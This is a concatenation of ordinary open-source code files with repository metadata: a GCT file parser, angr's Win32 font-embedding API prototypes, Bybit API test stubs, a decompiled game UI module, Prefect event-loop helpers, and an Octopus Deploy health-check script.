myGCToo = sg.subset_gctoo(myGCToo, rid=rid, cid=cid, ridx=ridx, cidx=cidx)
if row_meta_only:
return myGCToo.row_metadata_df
elif col_meta_only:
return myGCToo.col_metadata_df
else:
return myGCToo
def read_version_and_dims(file_path):
extension = os.path.splitext(file_path)[-1]
logger.debug("extension: {}".format(extension))
# Open file
f = open(file_path, "r") if ".gct" == extension else gzip.open(file_path, 'rt')
# Get version from the first line
version = f.readline().strip().lstrip("#")
if version not in ["1.3", "1.2"]:
err_msg = ("Only GCT1.2 and 1.3 are supported. The first row of the GCT " +
"file must simply be (without quotes) '#1.3' or '#1.2'")
logger.error(err_msg.format(version))
raise Exception(err_msg.format(version))
# Convert version to a string
version_as_string = "GCT" + str(version)
# Read dimensions from the second line
dims = f.readline().strip().split("\t")
# Close file
f.close()
# Check that the second row is what we expect
if version == "1.2" and len(dims) != 2:
error_msg = "GCT1.2 should have 2 dimension-related entries in row 2. dims: {}"
logger.error(error_msg.format(dims))
raise Exception(error_msg.format(dims))
elif version == "1.3" and len(dims) != 4:
error_msg = "GCT1.3 should have 4 dimension-related entries in row 2. dims: {}"
logger.error(error_msg.format(dims))
raise Exception(error_msg.format(dims))
# Explicitly define each dimension
num_data_rows = int(dims[0])
num_data_cols = int(dims[1])
if len(dims) == 4:
num_row_metadata = int(dims[2])
num_col_metadata = int(dims[3])
else:
num_row_metadata = 1
num_col_metadata = 0
# Return version and dimensions
return version_as_string, num_data_rows, num_data_cols, num_row_metadata, num_col_metadata
def parse_into_3_df(file_path, num_data_rows, num_data_cols, num_row_metadata, num_col_metadata, nan_values, data_type=DEFAULT_DATA_TYPE):
# Read the gct file beginning with line 3
full_df = pd.read_csv(file_path, sep="\t", header=None, skiprows=2,
dtype=str, na_values=nan_values, keep_default_na=False)
# Check that full_df is the size we expect
expected_row_num = num_col_metadata + num_data_rows + 1
expected_col_num = num_row_metadata + num_data_cols + 1
assert full_df.shape == (expected_row_num,
expected_col_num), (
("The shape of full_df is not as expected: expected shape is {} x {} " +
"parsed shape is {} x {}").format(expected_row_num, expected_col_num,
full_df.shape[0], full_df.shape[1]))
# Assemble metadata dataframes
row_metadata = assemble_row_metadata(full_df, num_col_metadata, num_data_rows, num_row_metadata)
col_metadata = assemble_col_metadata(full_df, num_col_metadata, num_row_metadata, num_data_cols)
# Assemble data dataframe
data = assemble_data(full_df, num_col_metadata, num_data_rows, num_row_metadata, num_data_cols, data_type)
# Return 3 dataframes
return row_metadata, col_metadata, data
def assemble_row_metadata(full_df, num_col_metadata, num_data_rows, num_row_metadata):
# Extract values
row_metadata_row_inds = range(num_col_metadata + 1, num_col_metadata + num_data_rows + 1)
row_metadata_col_inds = range(1, num_row_metadata + 1)
row_metadata = full_df.iloc[row_metadata_row_inds, row_metadata_col_inds]
# Create index from the first column of full_df (after the filler block)
row_metadata.index = full_df.iloc[row_metadata_row_inds, 0]
# Create columns from the top row of full_df (before cids start)
row_metadata.columns = full_df.iloc[0, row_metadata_col_inds]
# Rename the index name and columns name
row_metadata.index.name = row_index_name
row_metadata.columns.name = row_header_name
# Convert metadata to numeric if possible
row_metadata = row_metadata.apply(lambda x: pd.to_numeric(x, errors="ignore"))
return row_metadata
def assemble_col_metadata(full_df, num_col_metadata, num_row_metadata, num_data_cols):
# Extract values
col_metadata_row_inds = range(1, num_col_metadata + 1)
col_metadata_col_inds = range(num_row_metadata + 1, num_row_metadata + num_data_cols + 1)
col_metadata = full_df.iloc[col_metadata_row_inds, col_metadata_col_inds]
# Transpose so that samples are the rows and headers are the columns
col_metadata = col_metadata.T
# Create index from the top row of full_df (after the filler block)
col_metadata.index = full_df.iloc[0, col_metadata_col_inds]
# Create columns from the first column of full_df (before rids start)
col_metadata.columns = full_df.iloc[col_metadata_row_inds, 0]
# Rename the index name and columns name
col_metadata.index.name = column_index_name
col_metadata.columns.name = column_header_name
# Convert metadata to numeric if possible
col_metadata = col_metadata.apply(lambda x: pd.to_numeric(x, errors="ignore"))
return col_metadata
def assemble_data(full_df, num_col_metadata, num_data_rows, num_row_metadata, num_data_cols, data_type=DEFAULT_DATA_TYPE):
# Extract values
data_row_inds = range(num_col_metadata + 1, num_col_metadata + num_data_rows + 1)
data_col_inds = range(num_row_metadata + 1, num_row_metadata + num_data_cols + 1)
data = full_df.iloc[data_row_inds, data_col_inds]
# Create index from the first column of full_df (after the filler block)
data.index = full_df.iloc[data_row_inds, 0]
# Create columns from the top row of full_df (after the filler block)
data.columns = full_df.iloc[0, data_col_inds]
# Convert from str to float
try:
data = data.astype(data_type)
except:
# If that fails, return the first value that could not be converted
for col in data:
try:
data[col].astype(data_type)
except:
for row_idx, val in enumerate(data[col]):
try:
data_type(val)
except:
bad_row_label = data[col].index[row_idx]
err_msg = ("First instance of value that could not be converted: " +
"data.loc['{}', '{}'] = '{}'\nAdd to nan_values if you wish " +
"for this value to be considered NaN.").format(bad_row_label, col, val)
logger.error(err_msg)
raise Exception(err_msg)
# Rename the index name and columns name
data.index.name = row_index_name
data.columns.name = column_index_name
return data
def create_gctoo_obj(file_path, version, row_metadata_df, col_metadata_df, data_df, make_multiindex):
# Move dataframes into GCToo object
gctoo_obj = GCToo.GCToo(src=file_path,
version=version,
row_metadata_df=row_metadata_df,
col_metadata_df=col_metadata_df,
data_df=data_df, make_multiindex=make_multiindex)
return gctoo_obj
|
72995e6261824890f0c13cee96f06a26ff14536e
|
f3806d9fb54773908cd9704121a543b114470aca
|
/angr/procedures/definitions/win32_t2embed.py
|
1a7c2e02028d8840ebeab7ee3a29de2e0608d340
|
[
"BSD-2-Clause"
] |
permissive
|
angr/angr
|
8ae95fceca51b0a001de56477d984dd01193ac1d
|
37e8ca1c3308ec601ad1d7c6bc8081ff38a7cffd
|
refs/heads/master
| 2023-08-17T03:15:21.007865
| 2023-08-15T18:44:57
| 2023-08-15T18:44:57
| 40,328,394
| 7,184
| 1,306
|
BSD-2-Clause
| 2023-09-14T20:14:23
| 2015-08-06T21:46:55
|
Python
|
UTF-8
|
Python
| false
| false
| 11,514
|
py
|
win32_t2embed.py
|
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("t2embed.dll")
prototypes = \
{
#
'TTEmbedFont': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="TTEMBED_FLAGS"), SimTypeInt(signed=False, label="EMBED_FONT_CHARSET"), SimTypePointer(SimTypeInt(signed=False, label="EMBEDDED_FONT_PRIV_STATUS"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), label="LPArray", offset=0), SimTypeShort(signed=False, label="UInt16"), SimTypeShort(signed=False, label="UInt16"), SimTypePointer(SimStruct({"usStructSize": SimTypeShort(signed=False, label="UInt16"), "usRootStrSize": SimTypeShort(signed=False, label="UInt16"), "pusRootStr": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="TTEMBEDINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "ulFlags", "ulCharSet", "pulPrivStatus", "pulStatus", "lpfnWriteToStream", "lpvWriteStream", "pusCharCodeSet", "usCharCodeCount", "usLanguage", "pTTEmbedInfo"]),
#
'TTEmbedFontFromFileA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeShort(signed=False, label="UInt16"), SimTypeInt(signed=False, label="TTEMBED_FLAGS"), SimTypeInt(signed=False, label="EMBED_FONT_CHARSET"), SimTypePointer(SimTypeInt(signed=False, label="EMBEDDED_FONT_PRIV_STATUS"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), label="LPArray", offset=0), SimTypeShort(signed=False, label="UInt16"), SimTypeShort(signed=False, label="UInt16"), SimTypePointer(SimStruct({"usStructSize": SimTypeShort(signed=False, label="UInt16"), "usRootStrSize": SimTypeShort(signed=False, label="UInt16"), "pusRootStr": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="TTEMBEDINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "szFontFileName", "usTTCIndex", "ulFlags", "ulCharSet", "pulPrivStatus", "pulStatus", "lpfnWriteToStream", "lpvWriteStream", "pusCharCodeSet", "usCharCodeCount", "usLanguage", "pTTEmbedInfo"]),
#
'TTLoadEmbeddedFont': SimTypeFunction([SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="EMBEDDED_FONT_PRIV_STATUS"), offset=0), SimTypeInt(signed=False, label="FONT_LICENSE_PRIVS"), SimTypePointer(SimTypeInt(signed=False, label="TTLOAD_EMBEDDED_FONT_STATUS"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimStruct({"usStructSize": SimTypeShort(signed=False, label="UInt16"), "usRefStrSize": SimTypeShort(signed=False, label="UInt16"), "pusRefStr": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="TTLOADINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["phFontReference", "ulFlags", "pulPrivStatus", "ulPrivs", "pulStatus", "lpfnReadFromStream", "lpvReadStream", "szWinFamilyName", "szMacFamilyName", "pTTLoadInfo"]),
#
'TTGetEmbeddedFontInfo': SimTypeFunction([SimTypeInt(signed=False, label="TTEMBED_FLAGS"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=False, label="FONT_LICENSE_PRIVS"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimStruct({"usStructSize": SimTypeShort(signed=False, label="UInt16"), "usRefStrSize": SimTypeShort(signed=False, label="UInt16"), "pusRefStr": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="TTLOADINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ulFlags", "pulPrivStatus", "ulPrivs", "pulStatus", "lpfnReadFromStream", "lpvReadStream", "pTTLoadInfo"]),
#
'TTDeleteEmbeddedFont': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hFontReference", "ulFlags", "pulStatus"]),
#
'TTGetEmbeddingType': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="EMBEDDED_FONT_PRIV_STATUS"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "pulEmbedType"]),
#
'TTCharToUnicode': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "pucCharCodes", "ulCharCodeSize", "pusShortCodes", "ulShortCodeSize", "ulFlags"]),
#
'TTRunValidationTests': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"ulStructSize": SimTypeInt(signed=False, label="UInt32"), "lTestFromSize": SimTypeInt(signed=True, label="Int32"), "lTestToSize": SimTypeInt(signed=True, label="Int32"), "ulCharSet": SimTypeInt(signed=False, label="UInt32"), "usReserved1": SimTypeShort(signed=False, label="UInt16"), "usCharCodeCount": SimTypeShort(signed=False, label="UInt16"), "pusCharCodeSet": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="TTVALIDATIONTESTSPARAMS", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "pTestParam"]),
#
'TTIsEmbeddingEnabled': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "pbEnabled"]),
#
'TTIsEmbeddingEnabledForFacename': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["lpszFacename", "pbEnabled"]),
#
'TTEnableEmbeddingForFacename': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["lpszFacename", "bEnable"]),
#
'TTEmbedFontEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="TTEMBED_FLAGS"), SimTypeInt(signed=False, label="EMBED_FONT_CHARSET"), SimTypePointer(SimTypeInt(signed=False, label="EMBEDDED_FONT_PRIV_STATUS"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2"]), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), label="LPArray", offset=0), SimTypeShort(signed=False, label="UInt16"), SimTypeShort(signed=False, label="UInt16"), SimTypePointer(SimStruct({"usStructSize": SimTypeShort(signed=False, label="UInt16"), "usRootStrSize": SimTypeShort(signed=False, label="UInt16"), "pusRootStr": SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)}, name="TTEMBEDINFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "ulFlags", "ulCharSet", "pulPrivStatus", "pulStatus", "lpfnWriteToStream", "lpvWriteStream", "pulCharCodeSet", "usCharCodeCount", "usLanguage", "pTTEmbedInfo"]),
#
'TTRunValidationTestsEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"ulStructSize": SimTypeInt(signed=False, label="UInt32"), "lTestFromSize": SimTypeInt(signed=True, label="Int32"), "lTestToSize": SimTypeInt(signed=True, label="Int32"), "ulCharSet": SimTypeInt(signed=False, label="UInt32"), "usReserved1": SimTypeShort(signed=False, label="UInt16"), "usCharCodeCount": SimTypeShort(signed=False, label="UInt16"), "pulCharCodeSet": SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)}, name="TTVALIDATIONTESTSPARAMSEX", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hDC", "pTestParam"]),
#
'TTGetNewFontName': SimTypeFunction([SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["phFontReference", "wzWinFamilyName", "cchMaxWinName", "szMacFamilyName", "cchMaxMacName"]),
}
lib.set_prototypes(prototypes)
|
f236430321da95eba72f28cdbd574848a13a7d7d
|
684df684759bfbef64b0fbcde9eb2b898a2e2061
|
/swagger-gen/python/test/test_linear_order_api.py
|
84c25b72399b928d2b6bcedb10b4639694393d10
|
[] |
no_license
|
bybit-exchange/api-connectors
|
ae13caecb98c82460c0a24b910f2e9c1eb80b9bc
|
cc021a371bde30c2fd282be9fdc8eef0ed0e362e
|
refs/heads/master
| 2021-12-31T10:23:24.429638
| 2021-11-24T16:37:18
| 2021-11-24T16:37:18
| 213,896,494
| 192
| 185
| null | 2023-03-03T12:50:12
| 2019-10-09T11:10:19
|
C#
|
UTF-8
|
Python
| false
| false
| 1,705
|
py
|
test_linear_order_api.py
|
# coding: utf-8
"""
Bybit API
## REST API for the Bybit Exchange. Base URI: [https://api.bybit.com] # noqa: E501
OpenAPI spec version: 0.2.11
Contact: support@bybit.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.api.linear_order_api import LinearOrderApi # noqa: E501
from swagger_client.rest import ApiException
class TestLinearOrderApi(unittest.TestCase):
"""LinearOrderApi unit test stubs"""
def setUp(self):
self.api = swagger_client.api.linear_order_api.LinearOrderApi() # noqa: E501
def tearDown(self):
pass
def test_linear_order_cancel(self):
"""Test case for linear_order_cancel
Cancel Active Order # noqa: E501
"""
pass
def test_linear_order_cancel_all(self):
"""Test case for linear_order_cancel_all
Cancel all active orders. # noqa: E501
"""
pass
def test_linear_order_get_orders(self):
"""Test case for linear_order_get_orders
Get linear Active Orders # noqa: E501
"""
pass
def test_linear_order_new(self):
"""Test case for linear_order_new
Create Active Order # noqa: E501
"""
pass
def test_linear_order_query(self):
"""Test case for linear_order_query
Get Active Orders(real-time) # noqa: E501
"""
pass
def test_linear_order_replace(self):
"""Test case for linear_order_replace
Replace Active Order # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
|
d1ac21320769f48e14b9cc035b4d9c691b93835f
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/battle_results/presenter/event.py
|
6d44a42e572b4e6dab02e28a1b45715ff11b23c4
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 3,664
|
py
|
event.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/battle_results/presenter/event.py
import typing
from frameworks.wulf import Array
from gui.impl.gen.view_models.views.lobby.postbattle.widget_model import WidgetModel
from gui.server_events.event_items import WtQuest
from gui.shared.gui_items.loot_box import EventLootBoxes
from gui.shared.missions.packers.bonus import packBonusModelAndTooltipData, getDefaultBonusPackersMap, BonusUIPacker
from gui.wt_event.wt_event_bonuses_packers import WtLootboxTokenBonusPacker, WtTicketTokenBonusPacker
from helpers import dependency
from gui.server_events.bonuses import mergeBonuses
from skeletons.gui.game_control import IEventBattlesController, ILootBoxesController
if typing.TYPE_CHECKING:
from gui.server_events.bonuses import TokensBonus
from gui.battle_results.reusable import ReusableInfo
from gui.impl.gen.view_models.views.lobby.postbattle.widgets_model import WidgetsModel
def _getEventBonusWidgetsMap():
return {'battleToken': _WtWidgetTokenBonusPacker(),
'ticket': _WtWidgetTicketTokenBonusPacker()}
def _getWtEventBonusPacker():
mapping = getDefaultBonusPackersMap()
mapping.update(_getEventBonusWidgetsMap())
return BonusUIPacker(mapping)
class _WtWidgetTokenBonusPacker(WtLootboxTokenBonusPacker):
__boxesCtrl = dependency.descriptor(ILootBoxesController)
__gameEventCtrl = dependency.descriptor(IEventBattlesController)
@classmethod
def _getBonusModel(cls):
return WidgetModel()
@classmethod
def _packToken(cls, token, model):
super(_WtWidgetTokenBonusPacker, cls)._packToken(token, model)
disabled = True
if cls.__gameEventCtrl.isModeActive():
lootBox = cls._itemsCache.items.tokens.getLootBoxByTokenID(token.id)
if lootBox is not None:
lootBoxesCount = cls.__boxesCtrl.getLootBoxesCountByType(lootBox.getType())
disabled = lootBoxesCount == 0
model = typing.cast(WidgetModel, model)
model.setIsActionDisabled(disabled)
return
class _WtWidgetTicketTokenBonusPacker(WtTicketTokenBonusPacker):
__gameEventCtrl = dependency.descriptor(IEventBattlesController)
@classmethod
def _getBonusModel(cls):
return WidgetModel()
@classmethod
def _packToken(cls, token, model):
super(_WtWidgetTicketTokenBonusPacker, cls)._packToken(token, model)
model = typing.cast(WidgetModel, model)
model.setIsActionDisabled(not (cls.__gameEventCtrl.isModeActive() and cls.__gameEventCtrl.hasEnoughTickets()))
@dependency.replace_none_kwargs(gameEventCtrl=IEventBattlesController)
def _sortMap(gameEventCtrl=None):
return {gameEventCtrl.getConfig().ticketToken: 1,
EventLootBoxes.WT_HUNTER: 2,
EventLootBoxes.WT_BOSS: 2}
def setWidgets(model, reusable, _):
questsProgress = reusable.progress.getPlayerQuestProgress()
packer = _getWtEventBonusPacker()
bonuses = []
for e, _, _, _, isCompleted in questsProgress:
if isCompleted:
if isinstance(e, WtQuest):
bonuses.extend([ bonus for bonus in e.getBonuses() if bonus.getName() in _getEventBonusWidgetsMap().keys() ])
else:
bonuses.extend(e.getBonuses())
bonuses = mergeBonuses(bonuses)
modelsArr = Array[WidgetModel]()
packBonusModelAndTooltipData(bonuses, packer, modelsArr)
sortMap = _sortMap()
widgetsArr = model.getWidgets()
for bonusModel in sorted(modelsArr, key=lambda b: sortMap.get(b.getName(), len(sortMap))):
widgetsArr.addViewModel(bonusModel)
modelsArr.clear()
|
677bbd52fe334fa31468f76c9517218f4e8907a8
|
abe6c00f9790df7e6ef20dc02d0b1b225b5020cb
|
/src/prefect/_internal/concurrency/event_loop.py
|
3f4f187231ac669e381734479325d2ebcf8ee5db
|
[
"Apache-2.0"
] |
permissive
|
PrefectHQ/prefect
|
000e6c5f7df80f76a181f0a30f8661c96417c8bd
|
2c50d2b64c811c364cbc5faa2b5c80a742572090
|
refs/heads/main
| 2023-09-05T20:25:42.965208
| 2023-09-05T18:58:06
| 2023-09-05T18:58:06
| 139,199,684
| 12,917
| 1,539
|
Apache-2.0
| 2023-09-14T20:25:45
| 2018-06-29T21:59:26
|
Python
|
UTF-8
|
Python
| false
| false
| 2,594
|
py
|
event_loop.py
|
"""
Thread-safe utilities for working with asynchronous event loops.
"""
import asyncio
import concurrent.futures
import functools
from typing import Awaitable, Callable, Coroutine, Optional, TypeVar
from typing_extensions import ParamSpec
P = ParamSpec("P")
T = TypeVar("T")
def get_running_loop() -> Optional[asyncio.BaseEventLoop]:
"""
Get the current running loop.
Returns `None` if there is no running loop.
"""
try:
return asyncio.get_running_loop()
except RuntimeError:
return None
def call_in_loop(
__loop: asyncio.AbstractEventLoop,
__fn: Callable[P, T],
*args: P.args,
**kwargs: P.kwargs
) -> T:
"""
Run a synchronous call in event loop's thread from another thread.
This function is blocking and not safe to call from an asynchronous context.
Returns the result of the call.
"""
if __loop is get_running_loop():
return __fn(*args, **kwargs)
else:
future = call_soon_in_loop(__loop, __fn, *args, **kwargs)
return future.result()
def call_soon_in_loop(
__loop: asyncio.AbstractEventLoop,
__fn: Callable[P, T],
*args: P.args,
**kwargs: P.kwargs
) -> concurrent.futures.Future:
"""
Run a synchronous call in an event loop's thread from another thread.
This function is non-blocking and safe to call from an asynchronous context.
Returns a future that can be used to retrieve the result of the call.
"""
future = concurrent.futures.Future()
@functools.wraps(__fn)
def wrapper() -> None:
try:
result = __fn(*args, **kwargs)
except BaseException as exc:
future.set_exception(exc)
if not isinstance(exc, Exception):
raise
else:
future.set_result(result)
# `call_soon...` returns a `Handle` object which doesn't provide access to the
# result of the call. We wrap the call with a future to facilitate retrieval.
if __loop is get_running_loop():
__loop.call_soon(wrapper)
else:
__loop.call_soon_threadsafe(wrapper)
return future
async def run_coroutine_in_loop_from_async(
__loop: asyncio.AbstractEventLoop, __coro: Coroutine
) -> Awaitable:
"""
Run an asynchronous call in an event loop from an asynchronous context.
Returns an awaitable that returns the result of the coroutine.
"""
if __loop is get_running_loop():
return await __coro
else:
return await asyncio.wrap_future(
asyncio.run_coroutine_threadsafe(__coro, __loop)
)
|
271569242c4de1203f0831fdeae61171b1613b0e
|
41ffc3633d0b6ef61105fa19ad09794cd56f1453
|
/REST/python/Tasks/run-healthcheck.py
|
da2f7bc4c63c6823a35ada99c6f9337ec03119b9
|
[
"Apache-2.0"
] |
permissive
|
OctopusDeploy/OctopusDeploy-Api
|
4fb17afab9906708025fc1f391178cb2c8cb157c
|
c07ba75a893a441c0042dcaea2ea9b4a4ea85ae0
|
refs/heads/master
| 2023-08-31T01:20:12.281128
| 2023-08-17T17:13:44
| 2023-08-17T17:13:44
| 9,934,665
| 226
| 159
|
NOASSERTION
| 2023-09-13T16:02:21
| 2013-05-08T11:15:54
|
PowerShell
|
UTF-8
|
Python
| false
| false
| 2,837
|
py
|
run-healthcheck.py
|
import json
import requests
from requests.api import get, head
def get_octopus_resource(uri, headers, skip_count = 0):
items = []
skip_querystring = ""
if '?' in uri:
skip_querystring = '&skip='
else:
skip_querystring = '?skip='
response = requests.get((uri + skip_querystring + str(skip_count)), headers=headers)
response.raise_for_status()
# Get results of API call
results = json.loads(response.content.decode('utf-8'))
# Store results
if 'Items' in results.keys():
items += results['Items']
# Check to see if there are more results
if (len(results['Items']) > 0) and (len(results['Items']) == results['ItemsPerPage']):
skip_count += results['ItemsPerPage']
items += get_octopus_resource(uri, headers, skip_count)
else:
return results
# return results
return items
def convert(seconds):
seconds = seconds % (24 * 3600)
hour = seconds // 3600
seconds %= 3600
minutes = seconds // 60
seconds %= 60
return "%d:%02d:%02d" % (hour, minutes, seconds)
octopus_server_uri = 'https://YourURL'
octopus_api_key = 'API-YourAPIKey'
headers = {'X-Octopus-ApiKey': octopus_api_key}
space_name = "Default"
description = 'Health check started from Python script'
timeout_after_minutes = 5
machine_timeout_after_minutes = 5
environment_name = 'Development'
machine_names = [] # blank will check all machines in environment
# Get space
uri = '{0}/api/spaces'.format(octopus_server_uri)
spaces = get_octopus_resource(uri, headers)
space = next((x for x in spaces if x['Name'] == space_name), None)
# Get environment
uri = '{0}/api/{1}/environments'.format(octopus_server_uri, space['Id'])
environments = get_octopus_resource(uri, headers)
environment = next((e for e in environments if e['Name'] == environment_name), None)
# Get machines to check
machines_to_check = []
uri = '{0}/api/{1}/machines?environmentids={2}'.format(octopus_server_uri, space['Id'], environment['Id'])
machines = get_octopus_resource(uri, headers)
for machine in machines:
if len(machine_names) == 0:
machines_to_check.append(machine['Id'])
else:
if machine['Name'] in machine_names:
machines_to_check.append(machine['Id'])
# Construct payload
json_payload = {
'SpaceId': space['Id'],
'Name': 'Health',
'Description': description,
'Arguments': {
'Timeout': convert((timeout_after_minutes * 60)),
'MachineTimeout': convert((machine_timeout_after_minutes * 60)),
'EnvironmentId': environment['Id'],
'MachineIds': machines_to_check
}
}
print (json_payload)
uri = '{0}/api/{1}/tasks'.format(octopus_server_uri, space['Id'])
response = requests.post(uri, headers=headers, json=json_payload)
response.raise_for_status()
|
af2121bfd43ed6bd1c56b649f80e567c30725a8b
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/components/embedder_support/android/DEPS
|
f874c1236da3151da2a940a91d1a70f9ac22dfe4
|
[
"BSD-3-Clause"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
